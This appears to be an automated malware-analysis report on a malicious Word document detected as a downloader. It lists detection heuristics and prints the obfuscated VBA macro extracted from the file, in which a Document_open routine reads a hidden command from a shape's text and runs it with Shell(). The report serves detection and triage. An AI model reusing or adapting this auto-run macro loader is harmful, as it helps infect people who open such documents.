MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Valyria-6769640-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6769640-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
End If iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI) If (wEMNuff <> 0 Or vKHrGfLtQ) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() If (auIRQQ <> 0 Or aOWazKfw) Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7694 bytes |
SHA-256: 7bf97758d6844cc4086324a2982b7b41f0fd337e7bb2d3f3a8ec5b33ff1be7fc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
83 of 154 identifiers look randomly generated (e.g. 'IMuCUMWmGC'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IMuCUMWmGC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lwZCufGCP()
Const oXvSNWdI = 224789120 - 224789120
If (fHTtZ <> 0 Or vmRlIsaSH) Then
vmRlIsaSH = True
SSGLDOmUz = SSGLDOmUz & YGAKCB = 467282665 * 347386948
If (fHTtZ = 1) Then
SSGLDOmUz = SSGLDOmUz & FcNcin = Vlvwu - 325908429
SSGLDOmUz = SSGLDOmUz & JPiGC = GKwRU / wpYpmH
SSGLDOmUz = SSGLDOmUz & GzVptR = 126208497 / 45039723
Else
SSGLDOmUz = SSGLDOmUz & irqSSp = 235024981 - paJbtH
SSGLDOmUz = SSGLDOmUz & ujGLti = 137534374 - zqfwoN
SSGLDOmUz = SSGLDOmUz & KoZkoS = PUjwiY - 120808974
End If
End If
If (GpYVq <> 0 Or vuAprmnw) Then
vuAprmnw = True
TdsQiTrs = TdsQiTrs & BiUshq = 284512062 - 29939391
If (GpYVq = 1) Then
TdsQiTrs = TdsQiTrs & SaUpZc = nkfok + 533672341
TdsQiTrs = TdsQiTrs & wJnPF = ujvQlO * lTHRDM
TdsQiTrs = TdsQiTrs & vZLTI = rPEjw + GcqsuE
Else
TdsQiTrs = TdsQiTrs & owNXKi = 283011076 / cqufTc
TdsQiTrs = TdsQiTrs & bUXwUG = BfbORH + VvbNM
TdsQiTrs = TdsQiTrs & YMiCA = 232234157 * hlBVZN
End If
End If
mqlsPI = Shapes(NszoLN + AnwhAKT + 1 + milkrFp + PaNOGfh).TextFrame.ContainingRange + FoYcwZ + BTvOJMT
If (ciiWnKWj <> 0 Or nQlhTzZrN) Then
nQlhTzZrN = True
DJhLpGDVW = DJhLpGDVW & FOuLU = 529027297 / DwwSi
If (ciiWnKWj = 1) Then
DJhLpGDVW = DJhLpGDVW & wwmiz = AvpSw / 403899955
DJhLpGDVW = DJhLpGDVW & zcuSpQ = 462622714 + 416953551
DJhLpGDVW = DJhLpGDVW & oAPsZW = 274086552 / MQwdv
Else
DJhLpGDVW = DJhLpGDVW & MBMjZL = jVabn / 100433503
DJhLpGDVW = DJhLpGDVW & RMrIl = 520799977 / 4277701
DJhLpGDVW = DJhLpGDVW & fipBh = 109187285 * 524512413
End If
End If
iBhKoI = Shell(mqlsPI + ZHjzL + QzQLs, oXvSNWdI)
If (wEMNuff <> 0 Or vKHrGfLtQ) Then
vKHrGfLtQ = True
ZEvzzCJ = ZEvzzCJ & wWuBMo = 136441263 + 333651452
If (wEMNuff = 1) Then
ZEvzzCJ = ZEvzzCJ & FAaNr = 282855970 - cuCaWH
ZEvzzCJ = ZEvzzCJ & EiGdtU = kawHJ * PjIEt
ZEvzzCJ = ZEvzzCJ & SnAikj = twJtZ + vZaNQR
Else
ZEvzzCJ = ZEvzzCJ & rPTiC = DnPtm / jXowDD
ZEvzzCJ = ZEvzzCJ & wUaca = 517687982 * YfOdpV
ZEvzzCJ = ZEvzzCJ & nlHDTV = 211598828 + 315062024
End If
End If
If (zSZoF <> 0 Or FNVIK) Then
FNVIK = True
PMWzfdM = PMWzfdM & iclbP = 399999250 * 395708406
If (zSZoF = 1) Then
PMWzfdM = PMWzfdM & MAPbw = dXiWcs / 43176053
PMWzfdM = PMWzfdM & DCMlb = pGquzk - 162331629
PMWzfdM = PMWzfdM & jaaWhw = nzEzt * 154383572
Else
PMWzfdM = PMWzfdM & Sssiz = mcJBV - JmZLVG
PMWzfdM = PMWzfdM & qOMDw = 388283978 - piTMF
PMWzfdM = PMWzfdM & OsQWwN = uawGW * 325567165
End If
End If
If (jXMzc <> 0 Or wfCwGpw) Then
wfCwGpw = True
KtTPDD = KtTPDD & wtQdz = 271725045 / 83614485
If (jXMzc = 1) Then
KtTPDD = KtTPDD & MrsIp = 306560923 / rfSSUk
KtTPDD = KtTPDD & zipTPG = 471489280 - 386022285
KtTPDD = KtTPDD & ujhiq = Uzhdw / 150380567
Else
KtTPDD = KtTPDD & fSmoJ = 326048488 + 314223035
KtTPDD = KtTPDD & RLFmsb = fZEYIZ + WhPcK
KtTPDD = KtTPDD & RWJtw = 379478191 * 519240723
End If
End If
If (cliDXv <> 0 Or DGcWKvUoQ) Then
DGcWKvUoQ = True
twdnpJZX = twdnpJZX & KvQlch = EUiwZD + 325012030
If (cliDXv = 1) Then
twdnpJZX = twdnpJZX & jbIASL = 243762865 + 97847169
twdnpJZX = twdnpJZX & TzqQaX = dnbFfc * znUApj
twdnpJZX = twdnpJZX & zFUNqN = LhIGLw - zaVCJc
Else
twdnpJZX = twdnpJZX & hHqtaA = onAdbF - 218359720
twdnpJZX = twdnpJZX & sVDkK = 480985890 * 271183468
twdnpJZX = twdnpJZX & RGSwU = 450873287 - tzMzwf
End If
End If
End Function
Private Sub Document_open()
If (auIRQQ <> 0 Or aOWazKfw) Then
aOWazKfw = True
cEUajiz = cEUajiz & qnAEMF = 327800203 * ocbWLV
If (auIRQQ = 1) Then
cEUajiz = cEUajiz & AjWpMa = GULAJY * jGhwu
cEUajiz = cEUajiz & acPdN = llXjJ + 519343112
cEUajiz = cEUajiz & ApDoEu = 515032081 - 312413582
Else
cEUajiz = cEUajiz & YtkTp = CjdFV * 296778186
cEUajiz = cEUajiz & ZRAMXQ = bDoIik + QIjEu
cEUajiz = cEUajiz & mfVcq = 366197253 / 218370920
End If
End If
If (wfFNYlSk <> 0 Or HzijLFBww) Then
HzijLFBww = True
UTjAOwL = UTjAOwL & KBZnd = 319061158 + XIdwv
If (wfFNYlSk = 1) Then
UTjAOwL = UTjAOwL & BDohv = 200065476 - 491863933
UTjAOwL = UTjAOwL & oPiTz = hhVNQf / RNjHjS
UTjAOwL = UTjAOwL & TTJDc = 456738904 / 535880450
Else
UTjAOwL = UTjAOwL & BjVRf = EzIwTr - sGwtJ
UTjAOwL = UTjAOwL & zGiERw = 396145209 + 182634095
UTjAOwL = UTjAOwL & PazUF = 473031451 + qzjALE
End If
End If
If (zdTPNO <> 0 Or tIcksYF) Then
tIcksYF = True
SSzbI = SSzbI & osZvGj = oCwUoA - rjUznu
If (zdTPNO = 1) Then
SSzbI = SSzbI & KVjlU = HjfjjI + IltTGi
SSzbI = SSzbI & EFiPEX = MizBn - 267123905
SSzbI = SSzbI & NiWpK = 45991252 / pTHWRo
Else
SSzbI = SSzbI & ImGqAq = zIEqU / 309682322
SSzbI = SSzbI & wjvwii = 125639746 - 364226225
SSzbI = SSzbI & uidODJ = 434525500 / 4375307
End If
End If
If (bwjNbYPY <> 0 Or szKiO) Then
szKiO = True
ajVco = ajVco & YJomv = 410176811 + 224657245
If (bwjNbYPY = 1) Then
ajVco = ajVco & iIrmqW = YMUdt * 475746604
ajVco = ajVco & hKoGk = 457674572 - 463280713
ajVco = ajVco & NjZDi = 396580154 + 56394190
Else
ajVco = ajVco & hfhCnv = 443827369 - fmlQOF
ajVco = ajVco & oJqsG = cTHvk + DShEE
ajVco = ajVco & IEJqn = YZCOW * uZBifE
End If
End If
lwZCufGCP
If (LcIjCpj <> 0 Or AcfYLT) Then
AcfYLT = True
jkBinn = jkBinn & wZKSHu = 80734416 + 355806204
If (LcIjCpj = 1) Then
jkBinn = jkBinn & XWOpTQ = jcjvSz + HYWrT
jkBinn = jkBinn & lsobn = QfjWjh / 15906184
jkBinn = jkBinn & XcGRjr = 159107910 * nDIVm
Else
jkBinn = jkBinn & pmpAo = odJfhn * 113519003
jkBinn = jkBinn & jzvzG = 529810725 + NcZiAH
jkBinn = jkBinn & zPdijS = Szipih + sLOzY
End If
End If
If (LDsGCYYs <> 0 Or HptBbZ) Then
HptBbZ = True
bvOwj = bvOwj & VFOYoV = LhbdF * LkchuP
If (LDsGCYYs = 1) Then
bvOwj = bvOwj & hWApjj = KnBJi + 303723400
bvOwj = bvOwj & cinrdj = 182673655 / aEaNP
bvOwj = bvOwj & nNQwNU = JBwEZs / BGYjS
Else
bvOwj = bvOwj & HLdzlE = Lzcwn + jtGuo
bvOwj = bvOwj & ovoaji = lbCTj * vQobkT
bvOwj = bvOwj & JKYJZ = RAIOv - 270124549
End If
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.